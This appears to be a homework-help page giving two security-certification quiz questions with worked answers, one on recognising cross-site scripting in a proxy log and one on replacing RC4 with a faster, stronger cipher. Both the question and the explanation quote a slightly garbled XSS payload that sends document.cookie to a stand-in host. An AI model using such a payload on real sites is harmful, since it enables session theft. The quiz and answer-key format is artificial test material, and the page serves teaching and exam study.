Academic Integrity: tutoring, explanations, and feedback — we don’t complete graded work or submit on a student’s behalf.

Please solve both Questions carefully.. Thanks 35- A security administrator noti

ID: 3907015 • Letter: P

Question

Please solve both Questions carefully.. Thanks

35- A security administrator notices the following anomaly when reviewing the web proxy logs: Http://intranet/page.asp?variable-"document.location-"http://www.darkweb.com/? 20document.cookie A) XSRF B) SQL injection C) XSS D)Session hijacking 36- A Security engineer is asked to value performance while maintaining security on the company's streaming media site. After some industry concern arise with the way the company has implemented its RC4 algorithm, the security administrator decided to switch away from it in favor of stronger algorithm. Which of the following should the security administrator utilized while still favoring performance? A) Blowfish in the counter mode B) RIPEMD using electronic code book. C) DES using cipher feedback D) 3DES using Galois counter mode

Explanation / Answer

35

A security administrator notices the following anomaly when reviewing the web proxy logs: https://intranet/page.asp?variable="> <script>document. Location='https://www.darkweb.com/?'20 document.cookie</script>. XSS vulnerabilities is being exploited

Option-c

36.

A security engineer is asked to value performance while maintaining security on the company's streaming media site. After some industry concerns arise with the way the company has implemented its RC4 algorithm, the security administrator decides to switch away from it in favor of a stronger algorithm. Blowfish in counter mode is the security administrator utilize while still favoring performance

Option-a